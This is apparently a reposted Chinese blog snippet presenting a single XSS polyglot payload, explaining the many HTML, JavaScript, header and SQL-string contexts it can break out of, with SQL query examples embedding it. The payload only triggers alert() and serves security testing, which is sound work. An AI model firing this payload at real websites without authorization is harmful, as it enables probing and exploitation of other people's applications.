zoukankan      html  css  js  c++  java
  • 一句话综合型检测XSS,

    jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>x3csVg/<sVg/oNloAd=alert()//>x3e

    拿着这个Payload可检测大小写、注释、DOM等多种类型XSS

    可以插入单引号,双引号,无引号的属性之中,html转义,href src属性 ,html注释<!-- --> ,可插入任意html标签内容处,<div><title><style><textarea>,可插入js脚本单引号string 双引号string 正则表达式之中,单行注释//之后,多行注释/**/之中,可插入请求头之中的参数处比如set-cookie:x= xxx,可插入sql语句中,单引号双引号都可以, 比如

     SELECT * FROM Users WHERE Username='jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>x3csVg/<sVg/oNloAd=alert()//>x3e'
     SELECT * FROM Users WHERE Username="jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>x3csVg/<sVg/oNloAd=alert()//>x3e"

     

    From:https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot

  • 相关阅读:
    倒下
    我还能相信谁

    工作这点事
    人,这东西
    祝福
    路,公车和鞋子
    那片海
    document.querySelector bug All In One
    js logical or assignment bug All In One
  • 原文地址:https://www.cnblogs.com/forforever/p/12726295.html
Copyright © 2011-2022 走看看